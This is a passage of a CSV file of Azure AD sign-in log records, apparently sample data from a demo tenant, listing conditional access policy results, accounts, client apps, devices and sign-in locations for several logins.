0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:04,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",085ea0cc-073f-46e3-8c51-c48646df4900,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,085ea0cc-073f-46e3-8c51-c48646df4900,SigninLogs,Sucess,32.32146072,34.85319901
+391,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:27.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c0248bf9-ab20-45a5-b67a-ee3385d5bc4b,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",ee24a1df-994f-48af-adf3-fe18f5fe1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,ee24a1df-994f-48af-adf3-fe18f5fe1800,SigninLogs,Sucess,36.6404686,-78.26995087
+392,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:22.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a9c027ed-3114-4636-a76c-de3b671181f0,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",f22e123a-cab3-4cb1-81e0-9a3bbca91800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,f22e123a-cab3-4cb1-81e0-9a3bbca91800,SigninLogs,Sucess,36.6404686,-78.26995087
+393,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,90072,None,Other,0,812d4f5b-5d06-4f3d-b580-3ef3ba0e60e8,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,MSX Insights Production,75c6cfc8-e031-40aa-8392-e9f0463abbbd,,[],notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 18.18363'}",07569406-a371-436b-8ece-f602be9a2400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.1869888305664, 'latitude': 47.68061828613281}, 'state': 'Washington', 'city': 'Kirkland'}",none,none,none,none,[],"{'errorCode': 90072, 'failureReason': 'Other'}",CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,07569406-a371-436b-8ece-f602be9a2400,SigninLogs,Failed,47.68061829,-122.1869888
+394,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,300526cd-6890-4f53-95eb-96901ae0230c,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'JulianI Exchange native controls', 'result': 'success', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",success,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5949abe0-9b87-40bf-991e-6df7d25b1a00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,5949abe0-9b87-40bf-991e-6df7d25b1a00,SigninLogs,Sucess,50.6406517,5.572050095
+395,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,03:15.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4739a249-a8cf-4216-b575-e80280152861,Microsoft.aadiam,Microsoft.aadiam,,Julian Isla,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 17:03,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",8900d912-3d17-47c8-917b-3b43834c1b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Julian Isla,2935e535-8fdf-4217-865b-e084cb7214f1,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,8900d912-3d17-47c8-917b-3b43834c1b00,SigninLogs,Sucess,50.6406517,5.572050095
+396,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:12.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5a2823ca-1e3f-49f7-bb7b-c121a1f5b81c,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 15:05,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",3108dc47-edad-48bc-88bb-75cec1df1700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75cec1df1700,SigninLogs,Sucess,35.01296997,-80.93171692
+397,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:30.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,1f87c343-92d9-421f-9bde-551e2669a182,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",17ea6265-ad23-4765-8c42-0b9ff61f1a00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,17ea6265-ad23-4765-8c42-0b9ff61f1a00,SigninLogs,Sucess,36.6404686,-78.26995087
+398,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,24:05.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f573c208-54a9-4700-ad15-250885419633,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access 